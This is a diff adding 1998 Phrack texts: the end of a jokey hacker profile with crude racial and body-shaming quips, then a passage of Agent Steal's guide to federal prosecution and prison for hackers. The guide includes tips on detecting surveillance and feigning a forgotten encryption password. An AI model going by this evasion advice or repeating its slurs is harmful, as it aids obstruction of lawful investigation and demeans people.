+      Handle origin: L. Ron Hubbard and I thought it up.
+      Date of Birth: 07/74
+             Height: With heels or without?
+             Weight: In the sixth grade I was in a roman play.  I was Naples.
+          Eye color: Blue.
+         Hair Color: Blue.  I'm old.
+          Computers: Yes please.  Extra Mayo, No onions.
+           Admin of: Nothing. I'm not an admin.
+   Sites Frequented: www.scientology.org (If you are going to hack someone,
+                     hack me.)
+               URLs: The web is a really good excuse to waste time unless
+                     you are doing research, distributing religous propaganda, 
+                     or selling sex oriented products.
+	
+----------------[  Favorite Things
+
+             Women: Daemon9, are you trying to ask me something?
+              Cars: Porsche Carrera whatever
+             Foods: The Roxy in Encinitas, Ca., Filibertos in Encinitas, Ca., 
+                    and of course, "deli world" in the San Francisco ghetto
+                    (Excelsior).  $1 food is next door.
+             Music: Fugazi, Jazz, Acid Jazz, Lounge, Gregorian Chant, Jon 
+                    Spencer - Orange, One Dollar Food (Mondays at the Red 
+                    Devil Lounge in SF - Feds Welcome, but have good suits and 
+                    fast sneakers so I know who you are) 
+            Movies: Usual Suspects, Ferris Buellers Day Off, Mall Rats,
+                    Anything not starring pauly shore or Rodney Dangerfield.
+             Books: Chaos, making a new science by James Gleick 
+                    The C programming language, by Wik, and Als0 wik.
+		    "Why I just can't seem to dance" - A documentary by Daemon9
+            Quotes: "Hell hath no fury like a woman's scorn for Sega" - Brodie.
+                    "Woohoo! The water in this bathtub sure is ... white!" 
+                    - B. Clinton.
+		    "Woohoo! Jessie Jackson sure is black!" - Pat Buchanan.
+                    "I just never can seem to find things when I need them" 
+                    - Ollie North.
+		    "People will eat shit, if you just put salad dressing on 
+                    it." - B. Gates.
+                    "ARF! grr." - Tattoo.
+          Turn Ons: * Miniskirts, Garders, Vinyl, Perfume, Meat Eaters, Smart 
+                    Girls without attitudes.
+         Turn Offs: * Fat, ugly, smelly, vegetarian "granolas" with no
+                    personality who wear 20 year old clothes that they still 
+                    have not washed yet, and lack the social skills or 
+                    capacity to learn. 
+		    * Salespeople
+
+            
+----------------[  Passions
+    
+- Business (penetration testing / security auditing).  
+- Tropical places (relaxation).  
+- Urban places (excitement).  
+- Winky, the magic dog, mule, hare catcher.  
+- Computers / networking. 
+- My girlfriend. 
+- Europe in general (but honestly, if you are Dutch and you own a restaurant, 
+  come to the US, and learn about ground beef.  Also, figure out what "well 
+  done" means.  Honestly though, I must compliment you on your excellent 
+  selection of various strains of marijuana).
+
+
+----------------[  Memorable experiences
+
+- Owning switches over the Internet (TCP --> X.25).
+- Owning my first nice car.
+- Owning your machine.
+- Getting punched by a large Sicilian, and getting knocked out.
+- Putting a large Sicilian in the hospital.
+
+   
+----------------[  People to mention
+
+- Joan Croc, for all of the millions of dollars she never gave me.
+- Daemon9, for patting me on the back and breaking my spine by accident.
+- My girlfriend, for being the awesome girl next door.
+- Her parents, for feeding me all the time.
+- Tattoo, my puppy ... for pissing on my bed, my floor, and all my clothes.
+- Everyone who has ever served me coffee.
+- Everyone who has ever betrayed me. Thanks so much for your warmth and 
+  compassion.
+- Mr Rogers.  Using drugs to teach America's youth the moral responsibilities 
+  they should adopt for their upcoming, bright futures, and using puppets to 
+  illustrate the values of a smoothly flowing dictatorship.
+- My parents, for tolerating all the weird phone calls from the rest of you 
+  fuckers for many years, and for motivating me to learn about things I was 
+  interested in by telling me that I would never get a job if I didn't go to
+  college.  Heck, at least I didn't buy a degree out of a magazine, and end up 
+  President of the United States. 
+- Oprah, for providing me with entertainment while I watched you expand and
+  contract like a blowfish.  (I don't think she reads this anyway) (But if I'm
+  wrong, and Oprah is an avid phrack reader, then by all means .. sorry , it 
+  was only a joke...  Besides, according to MiB, you're an alien).
+
+
+----------------[  Pearls Of Wisdom
+
+- Don't take any wooden nickels, but if you do, make sure you get enough to 
+  build a log cabin.  Don't take any log cabins, but of you do, cut them up 
+  small enough that you can give alot of people wooden nickels.
+- Don't make up any cliches, but if you do, make sure they're funny.
+- Make your business work for you, don't work for your business.
+- Never ignore the ones you love.
+- Buy quality merchandise for your home the first time around... unless you
+  have roommates.
+- If everyone else around you gets caught, its time to stop.
+- If a speaker is a speaker, and not a "sound emissions device", then is
+  toilet paper "toilet paper", or "Butt Wiping Cloth?"
+- Eat out alot, unless she tells you to stop.
+- All the people who consistently come on irc and ask "teach me how to hack",
+  first of all, most of the people on irc understand English as well as its 
+  associated rules of grammar.  Second, pick up a fricking book once in a 
+  while and you might actually be surprised at what you are capable of. We're 
+  supposed to be evolving, remember?
+- When I was a young boy, I ate a snail.  If you are a young boy, don't.
+- If you beat the shit out of someone, make sure its not in front of my house, 
+  because I don't want to clean up all that shit.
+
+
+----[  EOF
+
diff --git a/phrack52/5.txt b/phrack52/5.txt
new file mode 100644
index 0000000..2e1662c
--- /dev/null
+++ b/phrack52/5.txt
@@ -0,0 +1,1271 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 05 of 20
+
+
+---------[  EVERYTHING A HACKER NEEDS TO KNOW ABOUT GETTING BUSTED BY THE FEDS
+
+
+--------[  Agent Steal <agentsteal@usa.net>
+
+
+From Federal Prison, 1997
+
+Contributions and editing by Minor Threat
+
+Special thanks to Evian S. Sim
+
+NOTICE: The following document is to be construed as "Legal Material" as set 
+forth in The Federal Bureau of Prisons policy statement, P.S. 1315.05, and as 
+codified in 28 C.F.R. 543.10-16
+
+This article may be freely reproduced, in whole or in part, provided 
+acknowledgments are given to the author.  Any reproduction for profit, lame 
+zines, (that means you t0mmy, el8, thief) or law enforcement use is prohibited.
+The author and contributor to this phile in no way advocate criminal behavior.
+
+			----------------
+			    CONTENTS
+			----------------
+
+INTRODUCTION
+
+PART I - FEDERAL CRIMINAL LAW		PART II - FEDERAL PRISON
+
+A.  Relevant Conduct			A.  State v. Federal
+B.  Preparing for Trial			B.  Security Levels
+C.  Plea Agreements and Attorneys	C.  Getting Designated
+D.  Conspiracy				D.  Ignorant Inmates
+E.  Sentencing				E.  Population
+F.  Use of Special Skill		F.  Doing Time
+G.  Getting Bail			G.  Disciplinary Action
+H.  State v. Federal Charges		H.  Administrative Remedy
+I.  Cooperating				I.  Prison Officials
+J.  Still Thinking About Trial		J.  The Hole
+K.  Search and Seizure			K.  Good Time
+L.  Surveillance			L.  Halfway House
+M.  Presentence Investigation		M.  Supervised Release
+N.  Proceeding Pro Se
+O.  Evidentiary Hearing
+P.  Return of Property
+Q.  Outstanding Warrants
+R.  Encryption
+S.  Summary
+
+Part III - 2600 Special Section:
+
+A.  How to Avoid Detection
+B.  The Stealth Box
+C.  More Protection
+
+CLOSURE
+
+
+
+INTRODUCTION
+
+	The likelihood of getting arrested for computer hacking has increased 
+to an unprecedented level.  No matter how precautionary or sage you are, you're
+bound to make mistakes.  And the fact of the matter is if you have trusted 
+anyone else with the knowledge of what you are involved in, you have made your 
+first mistake.
+
+	For anyone active in hacking I cannot begin to stress the importance 
+of the information contained in this file.  To those who have just been 
+arrested by the Feds, reading this file could mean the difference between a 
+three-year or a one-year sentence.  To those who have never been busted, 
+reading this file will likely change the way you hack, or stop you from 
+hacking altogether.
+
+	I realize my previous statements are somewhat lofty, but in the 35 
+months I spent incarcerated I've heard countless inmates say it: "If I knew 
+then what I know now..." I doubt that anyone would disagree: The criminal 
+justice system is a game to be played, both by prosecution and defense.  And if
+you have to be a player, you would be wise to learn the rules of engagement. 
+The writer and contributors of this file have learned the hard way.  As a 
+result we turned our hacking skills during the times of our incarceration 
+towards the study of criminal law and, ultimately, survival.  Having filed our 
+own motions, written our own briefs and endured life in prison, we now pass 
+this knowledge back to the hacker community.  Learn from our experiences... 
+and our mistakes.
+ 
+    - Agent Steal
+
+
+PART I - FEDERAL CRIMINAL LAW
+
+A.  THE BOTTOM LINE - RELEVANT CONDUCT
+
+	For those of you with a short G-phile attention span I'm going to 
+cover the single most important topic first.  This is probably the most 
+substantial misunderstanding of the present criminal justice system.  The 
+subject I am talking about is referred to in legal circles as "relevant 
+conduct."  It's a bit complex and I will get into this... However, I have to 
+make this crystal clear so that it will stick in your heads.  It boils down to 
+two concepts:
+
+I.  ONCE YOU ARE FOUND GUILTY OF EVEN ONE COUNT, EVERY COUNT WILL BE USED TO 
+    CALCULATE YOUR SENTENCE
+
+	Regardless of whether you plea bargain to one count or 100, your 
+sentence will be the same.  This is assuming we are talking about hacking, 
+code abuse, carding, computer trespass, property theft, etc.  All of these are 
+treated the same.  Other crimes you committed (but were not charged with) will 
+also be used to calculate your sentence.  You do not have to be proven guilty 
+of every act.  As long as it appears that you were responsible, or someone 
+says you were, then it can be used against you. I know this sounds insane , 
+but it's true; it's the preponderance of evidence standard for relevant 
+conduct.  This practice includes using illegally seized evidence and 
+acquittals as information in increasing the length of your sentence.
+
+II.  YOUR SENTENCE WILL BE BASED ON THE TOTAL MONETARY LOSS
+
+	The Feds use a sentencing table to calculate your sentence.  It's 
+simple; More Money = More Time.  It doesn't matter if you tried to break in 10 
+times or 10,000 times.  Each one could be a count but it's the loss that 
+matters.  And an unsuccessful attempt is treated the same as a completed crime.
+It also doesn't matter if you tried to break into one company's computer or 10.
+The government will quite simply add all of the estimated loss figures up, and 
+then refer to the sentencing table.
+
+B.  PREPARING FOR TRIAL
+
+	I've been trying to be overly simplistic with my explanation.  The 
+United States Sentencing Guidelines (U.S.S.G.), are in fact quite complex.  So 
+much so that special law firms are forming that deal only with sentencing.  If 
+you get busted, I would highly recommend hiring one.  In some cases it might 
+be wise to avoid hiring a trial attorney and go straight to one of these "Post 
+Conviction Specialists."  Save your money, plead out, do your time.  This may 
+sound a little harsh, but considering the fact that the U.S. Attorney's Office 
+has a 95% conviction rate, it may be sage advice.  However, I don't want to 
+gloss over the importance of a ready for trial posturing.  If you have a 
+strong trial attorney, and have a strong case, it will go a long way towards 
+good plea bargain negotiations. 
+
+C.  PLEA AGREEMENTS AND ATTORNEYS
+
+	Your attorney can be your worst foe or your finest advocate.  Finding 
+the proper one can be a difficult task.  Costs will vary and typically the 
+attorney asks you how much cash you can raise and then says, "that amount will 
+be fine".  In actuality a simple plea and sentencing should run you around 
+$15,000.  Trial fees can easily soar into the 6 figure category.  And finally, 
+a post conviction specialist will charge $5000 to $15,000 to handle your 
+sentencing presentation with final arguments.
+
+	You may however, find yourself at the mercy of The Public Defenders 
+Office.  Usually they are worthless, occasionally you'll find one that will 
+fight for you.  Essentially it's a crap shoot.  All I can say is if you don't 
+like the one you have, fire them and hope you get appointed a better one.  If 
+you can scrape together $5000 for a sentencing (post conviction) specialist to 
+work with your public defender I would highly recommend it. This specialist 
+will make certain the judge sees the whole picture and will argue in the most 
+effective manner for a light or reasonable sentence.  Do not rely on your 
+public defender to thoroughly present your case.  Your sentencing hearing is 
+going to flash by so fast you'll walk out of the court room dizzy.  You and 
+your defense team need to go into that hearing fully prepared, having already 
+filed a sentencing memorandum.
+
+	The plea agreement you sign is going to affect you and your case well 
+after you are sentenced.  Plea agreements can be tricky business and if you 
+are not careful or are in a bad defense position (the case against you is 
+strong), your agreement may get the best of you.  There are many issues in a 
+plea to negotiate over.  But essentially my advice would be to avoid signing 
+away your right to appeal.  Once you get to a real prison with real jailhouse 
+lawyers you will find out how bad you got screwed.  That issue notwithstanding,
+you are most likely going to want to appeal.  This being the case you need to 
+remember two things: bring all your appealable issues up at sentencing and 
+file a notice of appeal within 10 days of your sentencing.  Snooze and loose.
+
+	I should however, mention that you can appeal some issues even though 
+you signed away your rights to appeal.  For example, you can not sign away 
+your right to appeal an illegal sentence.  If the judge orders something that 
+is not permissible by statute, you then have a constitutional right to appeal 
+your sentence.
+
+	I will close this subpart with a prison joke. Q: How can you tell when 
+your attorney is lying? A: You can see his lips moving.
+
+ D.  CONSPIRACY 
+
+	Whatever happened to getting off on a technicality? I'm sorry to say 
+those days are gone, left only to the movies.  The courts generally dismiss 
+many arguments as "harmless error" or "the government acted in good faith". 
+The most alarming trend, and surely the root of the prosecutions success, are 
+the liberally worded conspiracy laws.  Quite simply, if two or more people 
+plan to do something illegal, then one of them does something in furtherance 
+of the objective (even something legal), then it's a crime.  Yes, it's true. 
+In America it's illegal to simply talk about committing a crime. Paging Mr. 
+Orwell. Hello?
+
+	Here's a hypothetical example to clarify this. Bill G. and Marc A. are 
+hackers (can you imagine?) Bill and Marc are talking on the phone and 
+unbeknownst to them the FBI is recording the call.  They talk about hacking 
+into Apple's mainframe and erasing the prototype of the new Apple Web Browser. 
+Later that day, Marc does some legitimate research to find out what type of 
+mainframe and operating system Apple uses.  The next morning, the Feds raid 
+Marc's house and seize everything that has wires. Bill and Marc go to trial 
+and spend millions to defend themselves.  They are both found guilty of 
+conspiracy to commit unauthorized access to a computer system.
+
+E.  SENTENCING
+
+	At this point it is up to the probation department to prepare a report 
+for the court.  It is their responsibility to calculate the loss and identify 
+any aggravating or mitigating circumstances.  Apple Computer Corporation 
+estimates that if Bill and Marc would have been successful it would have 
+resulted in a loss of $2 million.  This is the figure the court will use. 
+Based on this basic scenario our dynamic duo would receive roughly three-year 
+sentences.
+
+	As I mentioned, sentencing is complex and many factors can decrease or 
+increase a sentence, usually the latter.  Let's say that the FBI also found a 
+file on Marc's computer with 50,000 unauthorized account numbers and passwords 
+to The Microsoft Network.  Even if the FBI does not charge him with this, it 
+could be used to increase his sentence.  Generally the government places a 
+$200-per-account attempted loss on things of this nature (i.e. credit card 
+numbers and passwords = access devices).  This makes for a $10 million loss. 
+Coupled with the $2 million from Apple, Marc is going away for about nine 
+years.  Fortunately there is a Federal Prison not too far from Redmond, WA so 
+Bill could come visit him.
+
+	Some of the other factors to be used in the calculation of a sentence 
+might include the following: past criminal record, how big your role in the 
+offense was, mental disabilities, whether or not you were on probation at the 
+time of the offense, if any weapons were used, if any threats were used, if 
+your name is Kevin Mitnick (heh), if an elderly person was victimized, if you 
+took advantage of your employment position, if you are highly trained and used 
+your special skill, if you cooperated with the authorities, if you show 
+remorse, if you went to trial, etc.
+
+	These are just some of the many factors that could either increase or 
+decrease a sentence.  It would be beyond the scope of this article to cover 
+the U.S.S.G. in complete detail.  I do feel that I have skipped over some 
+significant issues. Nevertheless, if you remember my two main points in 
+addition to how the conspiracy law works, you'll be a long way ahead in 
+protecting yourself. 
+
+F.  USE OF A SPECIAL SKILL
+
+	The only specific "sentencing enhancement" I would like to cover would 
+be one that I am responsible for setting a precedent with.  In U.S. v Petersen,
+98 F.3d. 502, 9th Cir., the United States Court of Appeals held that some 
+computer hackers may qualify for the special skill enhancement.  What this 
+generally means is a 6 to 24 month increase in a sentence.  In my case it 
+added eight months to my 33-month sentence bringing it to 41 months.  
+Essentially the court stated that since I used my "sophisticated" hacking 
+skills towards a legitimate end as a computer security consultant, then the 
+enhancement applies.  It's ironic that if I were to have remained strictly a 
+criminal hacker then I would have served less time.
+
+	The moral of the story is that the government will find ways to give 
+you as much time as they want to.  The U.S.S.G. came into effect in 1987 in an 
+attempt to eliminate disparity in sentencing.  Defendants with similar crimes 
+and similar backgrounds would often receive different sentences. Unfortunately,
+this practice still continues.  The U.S.S.G. are indeed a failure. 
+
+G.  GETTING BAIL 
+
+	In the past, the Feds might simply have executed their raid and then 
+left without arresting you.  Presently this method will be the exception 
+rather than the rule and it is more likely that you will be taken into custody 
+at the time of the raid.  Chances are also good that you will not be released 
+on bail.  This is part of the government's plan to break you down and win their 
+case.  If they can find any reason to deny you bail they will.  In order to 
+qualify for bail, you must meet the following criteria:
+
+- You must be a resident of the jurisdiction in which you were arrested.
+- You must be gainfully employed or have family ties to the area.
+- You cannot have a history of failure to appear or escape.
+- You cannot be considered a danger or threat to the community.
+
+	In addition, your bail can be denied for the following reasons:
+
+- Someone came forward and stated to the court that you said you would flee if 
+  released.
+- Your sentence will be long if convicted.
+- You have a prior criminal history.
+- You have pending charges in another jurisdiction.
+
+	What results from all this "bail reform" is that only about 20% of 
+persons arrested make bail.  On top of that it takes 1-3 weeks to process your 
+bail papers when property is involved in securing your bond.
+
+	Now you're in jail, more specifically you are either in an 
+administrative holding facility or a county jail that has a contract with the 
+Feds to hold their prisoners.  Pray that you are in a large enough city to 
+justify its own Federal Detention Center.  County jails are typically the last 
+place you would want to be.
+ 
+H. STATE VS. FEDERAL CHARGES 
+
+	In some cases you will be facing state charges with the possibility of 
+the Feds "picking them up."  You may even be able to nudge the Feds into 
+indicting you.  This is a tough decision.  With the state you will do 
+considerably less time, but will face a tougher crowd and conditions in prison.
+Granted, Federal Prisons can be violent too, but generally as a non-violent 
+white collar criminal you will eventually be placed into an environment with 
+other low security inmates.  More on this later.
+
+	Until you are sentenced, you will remain as a "pretrial inmate" in 
+general population with other inmates.  Some of the other inmates will be 
+predatorial but the Feds do not tolerate much nonsense.  If someone acts up, 
+they'll get thrown in the hole.  If they continue to pose a threat to the 
+inmate population, they will be left in segregation (the hole).  Occasionally 
+inmates that are at risk or that have been threatened will be placed in 
+segregation.  This isn't really to protect the inmate.  It is to protect the 
+prison from a lawsuit should the inmate get injured.
+
+ I.  COOPERATING
+
+	Naturally when you are first arrested the suits will want to talk to 
+you.  First at your residence and, if you appear to be talkative, they will 
+take you back to their offices for an extended chat and a cup of coffee.  My 
+advice at this point is tried and true and we've all heard it before: remain 
+silent and ask to speak with an attorney.  Regardless of what the situation is,
+or how you plan to proceed, there is nothing you can say that will help you. 
+Nothing.  Even if you know that you are going to cooperate, this is not the 
+time.
+
+	This is obviously a controversial subject, but the fact of the matter 
+is roughly 80% of all defendants eventually confess and implicate others.  This
+trend stems from the extremely long sentences the Feds are handing out these 
+days.  Not many people want to do 10 to 20 years to save their buddies' hides 
+when they could be doing 3 to 5.  This is a decision each individual needs to 
+make.  My only advice would be to save your close friends and family.  Anyone 
+else is fair game.  In the prison system the blacks have a saying "Getting 
+down first."  It's no secret that the first defendant in a conspiracy is 
+usually going to get the best deal.  I've even seen situations where the big 
+fish turned in all his little fish and received 40% off his sentence. 
+
+	Incidentally, being debriefed or interrogated by the Feds can be an 
+ordeal in itself.  I would -highly- recommend reading up on interrogation 
+techniques ahead of time.  Once you know their methods it will be all quite 
+transparent to you and the debriefing goes much more smoothly.
+
+	When you make a deal with the government you're making a deal with the 
+devil himself.  If you make any mistakes they will renege on the deal and 
+you'll get nothing.  On some occasions the government will trick you into 
+thinking they want you to cooperate when they are not really interested in 
+anything you have to say.  They just want you to plead guilty.  When you sign 
+the cooperation agreement there are no set promises as to how much of a 
+sentence reduction you will receive.  That is to be decided after your 
+testimony, etc.  and at the time of sentencing.  It's entirely up to the judge.
+However, the prosecution makes the recommendation and the judge generally goes 
+along with it.  In fact, if the prosecution does not motion the court for your 
+"downward departure" the courts' hands are tied and you get no break.
+
+	As you can see, cooperating is a tricky business.  Most people, 
+particularly those who have never spent a day in jail, will tell you not to 
+cooperate.  "Don't snitch."  This is a noble stance to take.  However, in some 
+situations this is just plain stupid.  Saving someone's ass who would easily 
+do the same to you is a tough call.  It's something that needs careful 
+consideration.  Like I said, save your friends then do what you have to do to 
+get out of prison and on with your life.
+
+	I'm happy to say that I was able to avoid involving my good friends 
+and a former employer in the massive investigation that surrounded my case.  It
+wasn't easy.  I had to walk a fine line.  Many of you probably know that I 
+(Agent Steal) went to work for the FBI after I was arrested.  I was 
+responsible for teaching several agents about hacking and the culture.  What 
+many of you don't know is that I had close FBI ties prior to my arrest.  I was 
+involved in hacking for over 15 years and had worked as a computer security 
+consultant.  That is why I was given that opportunity.  It is unlikely however,
+that we will see many more of these types of arrangements in the future.  Our
+relationship ran afoul, mostly due to their passive negligence and lack of 
+experience in dealing with hackers.  The government in general now has their 
+own resources, experience, and undercover agents within the community.  They 
+no longer need hackers to show them the ropes or the latest security hole. 
+
+	Nevertheless, if you are in the position to tell the Feds something 
+they don't know and help them build a case against someone, you may qualify 
+for a sentence reduction.  The typical range is 20% to 70%.  Usually it's 
+around 35% to 50%.  Sometimes you may find yourself at the end of the 
+prosecutorial food chain and the government will not let you cooperate.  Kevin 
+Mitnick would be a good example of this.  Even if he wanted to roll over, I 
+doubt it would get him much.  He's just too big of a fish, too much media. My 
+final advice in this matter is get the deal in writing before you start 
+cooperating.
+
+	The Feds also like it when you "come clean" and accept responsibility. 
+There is a provision in the Sentencing Guidelines, 3E1.1, that knocks a little 
+bit of time off if you confess to your crime, plead guilty and show remorse.  
+If you go to trial, typically you will not qualify for this "acceptance of 
+responsibility" and your sentence will be longer.
+
+J.  STILL THINKING ABOUT TRIAL
+
+	Many hackers may remember the Craig Neidorf case over the famous 911 
+System Operation documents.  Craig won his case when it was discovered that 
+the manual in question, that he had published in Phrack magazine, was not 
+proprietary as claimed but available  publicly from AT&T.  It was an egg in 
+the face day for the Secret Service.
+
+	Don't be misled by this.  The government learned a lot from this 
+fiasco and even with the laudable support from the EFF, Craig narrowly 
+thwarted off a conviction.  Regardless, it was a trying experience (no pun 
+intended) for him and his attorneys.  The point I'm trying to make is that it's
+tough to beat the Feds.  They play dirty and will do just about anything, 
+including lie, to win their case.  If you want to really win you need to know 
+how they build a case in the first place.
+
+K.  SEARCH AND SEIZURE
+
+	There is a document entitled "Federal Guidelines For Searching And 
+Seizing Computers."  It first came to my attention when it was published in 
+the 12-21-94 edition of the Criminal Law Reporter by the Bureau of National 
+Affairs (Cite as 56 CRL 2023 ).  It's an intriguing collection of tips, cases, 
+mistakes and, in general, how to bust computer hackers.  It's recommended 
+reading.
+
+	Search and seizure is an ever evolving jurisprudence.  What's not 
+permissible today may, through some convoluted Supreme Court logic, be 
+permissible and legal tomorrow.  Again, a complete treatment of this subject 
+is beyond the scope of this paper.  But suffice it to say if a Federal agent 
+wants to walk right into your bedroom and seize all of your computer equipment 
+without a warrant he could do it by simply saying he had probable cause (PC). 
+PC is anything that gives him an inkling to believe you were committing a 
+crime.  Police have been known to find PC to search a car when the trunk sat 
+too low to the ground or the high beams were always on.
+
+L.  SURVEILLANCE AND WIRETAPS
+
+	Fortunately the Feds still have to show a little restraint when 
+wielding their wiretaps.  It requires a court order and they have to show that 
+there is no other way to obtain the information they seek, a last resort if 
+you will.  Wiretaps are also expensive to operate.  They have to lease lines 
+from the phone company, pay agents to monitor it 24 hours a day and then 
+transcribe it.  If we are talking about a data tap, there are additional costs.
+Expensive interception/translation equipment must be in place to negotiate the 
+various modem speeds.  Then the data has to be stored, deciphered, 
+decompressed, formatted, protocoled, etc.  It's a daunting task and usually 
+reserved for only the highest profile cases.  If the Feds can seize the data 
+from any other source, like the service provider or victim, they will take 
+that route.  I don't know what they hate worse though, asking for outside help 
+or wasting valuable internal resources.
+
+	The simplest method is to enlist the help of an informant who will 
+testify "I saw him do it!," then obtain a search warrant to seize the evidence 
+on your computer. Ba da boom, ba da busted.
+
+	Other devices include a pen register which is a device that logs every 
+digit you dial on your phone and the length of the calls, both incoming and 
+outgoing.  The phone companies keep racks of them at their security 
+departments. They can place one on your line within a day if they feel you are 
+defrauding them.  They don't need a court order, but the Feds do.
+
+	A trap, or trap and trace, is typically any method the phone company 
+uses to log every number that calls a particular number.  This can be done on 
+the switching system level or via a billing database search.  The Feds need a 
+court order for this information too.  However, I've heard stories of 
+cooperative telco security investigations passing the information along to an 
+agent.  Naturally that would be a "harmless error while acting in good faith." 
+(legal humor)...
+
+	I'd love to tell you more about FBI wiretaps but this is as far as I 
+can go without pissing them off.  Everything I've told you thus far is public 
+knowledge.  So I think I'll stop here.  If you really want to know more, catch 
+Kevin Poulsen (Dark Dante) at a cocktail party, buy him a Coke and he'll give 
+you an earful. (hacker humor)
+
+	In closing this subpart I will say that most electronic surveillance 
+is backed up with at least part-time physical surveillance.  The Feds are 
+often good at following people around.  They like late model mid-sized 
+American cars, very stock, with no decals or bumper stickers.  If you really 
+want to know if you're under surveillance, buy an Opto-electronics Scout or 
+Xplorer frequency counter.  Hide it on your person, stick an ear plug in your 
+ear (for the Xplorer) and take it everywhere you go.  If you hear people 
+talking about you, or you continue to hear intermittent static (encrypted 
+speech), you probably have a problem.
+
+M.   YOUR PRESENTENCE INVESTIGATION REPORT, PSI OR PSR 
+
+	After you plead guilty you will be dragged from the quiet and comfort 
+of your prison cell to meet with a probation officer.  This has absolutely 
+nothing to do with getting probation.  Quite the contrary.  The P.O. is 
+empowered by the court to prepare a complete and, in theory, unbiased profile 
+of the defendant.  Everything from education, criminal history, psychological 
+behavior, offense characteristics plus more will be included in this 
+voluminous and painfully detailed report about your life.  Every little dirty 
+scrap of information that makes you look like a sociopath, demon worshiping, 
+loathsome criminal will be included in this report.  They'll put a few negative
+things in there as well.
+
+	My advice is simple.  Be careful what you tell them.  Have your 
+attorney present and think about how what you say can be used against you. 
+Here's an example:
+
+P.O.: Tell me about your education and what you like to do in your spare time.
+
+Mr. Steal: I am preparing to enroll in my final year of college. In my spare
+           time I work for charity helping orphan children.
+
+The PSR then reads "Mr. Steal has never completed his education and hangs 
+around with little children in his spare time." Get the picture?
+
+J.  PROCEEDING PRO SE 
+
+	Pro Se or Pro Per is when a defendant represents himself.  A famous 
+lawyer once said "a man that represents himself has a fool for a client." 
+Truer words were never spoken.  However, I can't stress how important it is to 
+fully understand the criminal justice system.  Even if you have a great 
+attorney it's good to be able to keep an eye on him or even help out.  An 
+educated client's help can be of enormous benefit to an attorney.  They may 
+think you're a pain in the ass but it's your life.  Take a hold of it.  
+Regardless, representing yourself is generally a mistake.
+
+	However, after your appeal, when your court appointed attorney runs 
+out on you, or you have run out of funds, you will be forced to handle matters 
+yourself.  At this point there are legal avenues, although quite bleak, for 
+post-conviction relief.
+
+	But I digress.  The best place to start in understanding the legal 
+system lies in three inexpensive books.  First the Federal Sentencing 
+Guidelines ($14.00) and Federal Criminal Codes and Rules ($20.00) are 
+available from West Publishing at 800-328-9352.  I consider possession of 
+these books to be mandatory for any pretrial inmate.  Second would be the 
+Georgetown Law Journal, available from Georgetown University Bookstore in 
+Washington, DC.  The book sells for around $40.00 but if you write them a 
+letter and tell them you're a Pro Se litigant they will send it for free.  And 
+last but not least the definitive Pro Se authority, "The Prisoners Self Help 
+Litigation Manual" $29.95 ISBN 0-379-20831-8.  Or try 
+http://www.oceanalaw.com/books/n148.htm
+
+O.  EVIDENTIARY HEARING 
+
+	If you disagree with some of the information presented in the 
+presentence report (PSR) you may be entitled to a special hearing.  This can 
+be instrumental in lowering your sentence or correcting your PSR.  One 
+important thing to know is that your PSR will follow you the whole time you 
+are incarcerated.  The Bureau of Prisons uses the PSR to decide how to handle 
+you.  This can affect your security level, your halfway house, your 
+eligibility for the drug program (which gives you a year off your sentence),
+and your medical care.  So make sure your PSR is accurate before you get 
+sentenced!
+
+P.  GETTING YOUR PROPERTY BACK 
+
+	In most cases it will be necessary to formally ask the court to have 
+your property returned.  They are not going to just call you up and say "Do 
+you want this Sparc Station back or what?" No, they would just as soon keep it 
+and not asking for it is as good as telling them they can have it.
+
+	You will need to file a 41(e) "Motion For Return Of Property." The 
+courts' authority to keep your stuff is not always clear and will have to be 
+taken on a case-by-case basis.  They may not care and the judge will simply 
+order that it be returned.
+
+	If you don't know how to write a motion, just send a formal letter to 
+the judge asking for it back.  Tell him you need it for your job.  This should 
+suffice, but there may be a filing fee.
+
+Q.  OUTSTANDING WARRANTS
+
+	If you have an outstanding warrant or charges pending in another 
+jurisdiction you would be wise to deal with them as soon as possible -after- 
+you are sentenced.  If you follow the correct procedure chances are good the 
+warrants will be dropped (quashed).  In the worst case scenario, you will be 
+transported to the appropriate jurisdiction, plead guilty and have your "time 
+run concurrent."  Typically in non-violent crimes you can serve several 
+sentences all at the same time.  Many Federal inmates have their state time 
+run with their Federal time.  In a nutshell: concurrent is good, consecutive 
+bad.
+
+	This procedure is referred to as the Interstate Agreement On Detainers 
+Act (IADA).  You may also file a "demand for speedy trial", with the 
+appropriate court.  This starts the meter running.  If they don't extradite 
+you within a certain period of time, the charges will have to be dropped.  The 
+"Inmates' Self-Help Litigation Manual" that I mentioned earlier covers this 
+topic quite well.
+
+R.   ENCRYPTION
+
+	There are probably a few of you out there saying, "I triple DES 
+encrypt my hard drive and 128 character RSA public key it for safety." Well, 
+that's just great, but... the Feds can have a grand jury subpoena your 
+passwords and if you don't give them up you may be charged with obstruction of 
+justice.  Of course who's to say otherwise if you forgot your password in all 
+the excitement of getting arrested.  I think I heard this once or twice before 
+in a Senate Sub-committee hearing.  "Senator, I have no recollection of the 
+aforementioned events at this time."  But seriously, strong encryption is 
+great.  However, it would be foolish to rely on it.  If the Feds have your 
+computer and access to your encryption software itself, it is likely they 
+could break it given the motivation.  If you understand the true art of code 
+breaking you should understand this.  People often overlook the fact that your 
+password, the one you use to access your encryption program, is typically less 
+than 8 characters long.  By attacking the access to your encryption program 
+with a keyboard emulation sequencer your triple DES/128 bit RSA crypto is 
+worthless.  Just remember, encryption may not protect you.
+
+S.  LEGAL SUMMARY
+
+	Before I move on to the Life in Prison subpart, let me tell you what 
+this all means.  You're going to get busted, lose everything you own, not get 
+out on bail, snitch on your enemies, get even more time than you expected and 
+have to put up with a bunch of idiots in prison.  Sound fun?  Keep hacking. 
+And, if possible, work on those sensitive .gov sites.  That way they can hang 
+an espionage rap on you.  That will carry about 12 to 18 years for a first 
+time offender.
+
+	I know this may all sound a bit bleak, but the stakes for hackers have 
+gone up and you need to know what they are.  Let's take a look at some recent 
+sentences:
+
+      Agent Steal (me) 41 months
+      Kevin Poulsen 51 months
+      Minor Threat 70 months
+      Kevin Mitnick estimated 7-9 years
+
+	As you can see, the Feds are giving out some time now.  If you are 
+young, a first-time offender, unsophisticated (like MOD), and were just 
+looking around in some little company's database, you might get probation.  But
+chances are that if that is all you were doing, you would have been passed 
+over for prosecution.  As a rule, the Feds won't take the case unless $10,000 
+in damages are involved.  The problem is who is to say what the loss is?  The 
+company can say whatever figure it likes and it would be tough to prove 
+otherwise.  They may decide to, for insurance purposes, blame some huge 
+downtime expense on you.  I can hear it now, "When we detected the intruder, 
